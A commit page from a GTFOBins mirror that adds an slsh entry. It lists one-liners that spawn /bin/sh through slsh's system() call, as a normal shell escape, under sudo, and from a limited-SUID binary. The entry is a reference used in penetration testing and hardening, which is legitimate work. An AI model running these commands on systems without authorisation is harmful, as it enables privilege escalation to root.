1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 00:06:03 +02:00

Create slsh.md

This commit is contained in:
bcoles 2020-11-11 06:06:53 +11:00 committed by GitHub
parent 03c30e9944
commit e242e92634
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

9
_gtfobins/slsh.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
shell:
- code: slsh -e 'system("/bin/sh")'
sudo:
- code: sudo slsh -e 'system("/bin/sh")'
limited-suid:
- code: ./slsh -e 'system("/bin/sh")'
---